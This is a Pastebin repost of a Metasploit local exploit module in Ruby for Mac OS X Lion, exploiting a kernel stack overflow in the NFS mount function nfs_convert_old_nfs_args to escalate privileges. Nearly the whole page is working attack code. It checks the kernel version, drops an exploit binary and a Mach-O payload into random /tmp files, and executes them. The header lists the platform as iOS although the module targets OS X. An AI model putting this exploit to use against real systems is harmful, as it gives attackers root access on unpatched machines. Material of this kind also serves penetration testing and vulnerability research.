Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ==================================================
- Full title Mac OS X NFS Mount Privilege Escalation Exploit
- Date add 2014-04-26
- Category local exploits
- Platform iOS
- Risk <font color="#FFBF00">Security Risk High</font>
- Description This exploit leverage a stack overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size of a user-provided argument before copying it to the stack. As a result by passing a large size, a local user can overwrite the stack with arbitrary content. Mac OS X Lion Kernel versions equal to and below xnu-1699.32.7 except xnu-1699.24.8 are affected.
- ==================================================
- ##
- # This module requires Metasploit: http//metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'msf/core'
- require 'rex'
- class Metasploit3 < Msf::Exploit::Local
- Rank = NormalRanking
- include Msf::Post::File
- include Msf::Exploit::EXE
- include Msf::Exploit::FileDropper
- def initialize(info={})
- super(update_info(info,
- 'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit',
- 'Description' => %q{
- This exploit leverage a stack overflow vulnerability to escalate privileges.
- The vulnerable function nfs_convert_old_nfs_args does not verify the size
- of a user-provided argument before copying it to the stack. As a result by
- passing a large size, a local user can overwrite the stack with arbitrary
- content.
- Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Kenzley Alphonse', # discovery and a very well-written exploit
- 'joev' # msf module
- ],
- 'References' =>
- [
- [ 'EDB', '32813' ]
- ],
- 'Platform' => 'osx',
- 'Arch' => [ ARCH_X86_64 ],
- 'SessionTypes' => [ 'shell', 'meterpreter' ],
- 'Targets' => [
- [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
- {
- 'Platform' => 'osx',
- 'Arch' => ARCH_X86_64
- }
- ]
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Apr 11 2014'
- ))
- end
- def check
- if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
- Exploit::CheckCode::Vulnerable
- else
- Exploit::CheckCode::Safe
- end
- end
- def exploit
- osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
- file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
- exploit = File.read(file)
- pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
- tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
- payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
- print_status "Writing temp file... #{tmpfile}"
- write_file(tmpfile, exploit)
- register_file_for_cleanup(tmpfile)
- print_status "Writing payload file... #{payloadfile}"
- write_file(payloadfile, pload)
- register_file_for_cleanup(payloadfile)
- print_status "Executing payload..."
- cmd_exec("chmod +x #{tmpfile}")
- cmd_exec("chmod +x #{payloadfile}")
- cmd_exec("#{tmpfile} #{payloadfile}")
- end
- def xnu_ver
- m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
- m && m[1]
- end
- def ver_lt(a, b)
- Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,''))
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement